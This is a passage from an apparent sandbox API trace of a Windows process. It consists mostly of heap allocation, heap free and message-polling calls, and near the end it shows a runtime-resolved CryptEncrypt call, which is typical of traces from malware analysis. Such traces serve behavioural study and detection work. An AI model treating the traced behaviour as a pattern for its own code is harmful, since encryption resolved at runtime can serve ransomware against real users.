out: hHeap=0x2af0000) returned 1 [0212.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0212.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0212.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0212.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0212.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0212.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0212.589] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0212.589] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0212.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0212.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0212.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab608 [0212.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0212.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0212.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0212.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0212.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0212.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0212.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0212.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0212.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854818 | out: hHeap=0x2af0000) returned 1 [0212.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0212.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0212.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0212.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0212.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0212.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0212.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0212.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0212.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0212.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0212.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0212.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0212.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0212.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0212.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0212.591] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0212.591] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0212.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0212.591] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0212.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0212.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0212.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab5a8 [0212.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x3854500 [0212.591] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0212.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0212.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0212.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0212.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0212.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0212.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0212.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0212.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0212.592] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0212.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0212.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0212.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0212.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0212.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0212.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0212.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0212.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0212.592] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0212.592] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0212.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0212.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0212.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0212.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0212.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0212.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0212.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0212.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0212.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0212.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0212.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0212.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0212.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0212.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0212.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0212.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0212.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0212.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0212.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0212.593] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854500 | out: hHeap=0x2af0000) returned 1 [0212.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0212.593] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0212.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0212.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0212.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0212.594] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0212.594] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0212.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0212.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0212.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0212.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0212.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0212.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0212.594] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0212.594] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0212.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0212.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0212.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0212.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0212.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0212.595] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.595] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0212.595] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0212.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab488 [0212.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0212.595] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0212.595] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0212.595] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.595] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0212.595] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0212.595] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0212.595] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0212.595] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0212.595] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0212.595] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0212.595] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0212.596] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0212.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0212.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0212.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0212.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0212.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0212.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0212.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0212.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0212.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0212.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0212.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0212.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0212.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0212.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0212.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0212.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0212.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0212.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0212.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0212.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0212.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0212.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0212.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0212.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0212.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0212.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0212.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0212.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0212.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0212.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0212.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0212.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0212.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0212.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0212.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0212.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0212.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75760 | out: hHeap=0x2af0000) returned 1 [0212.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0212.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0212.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0212.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0212.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0212.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0212.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0212.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0212.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0212.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0212.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0212.597] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0212.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0212.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0212.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0212.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0212.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0212.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0212.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0212.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0212.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0212.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0212.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0212.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0212.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0212.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0212.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab6c8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0212.598] CryptEncrypt (in: hKey=0x9e1ab8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x1f8, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x200) returned 1 [0212.599] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.599] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.599] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.599] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.599] CharLowerBuffW (in: lpsz="byte[512]", cchLength=0x9 | out: lpsz="byte[512]") returned 0x9 [0212.599] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.599] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.599] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.599] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.599] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.599] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 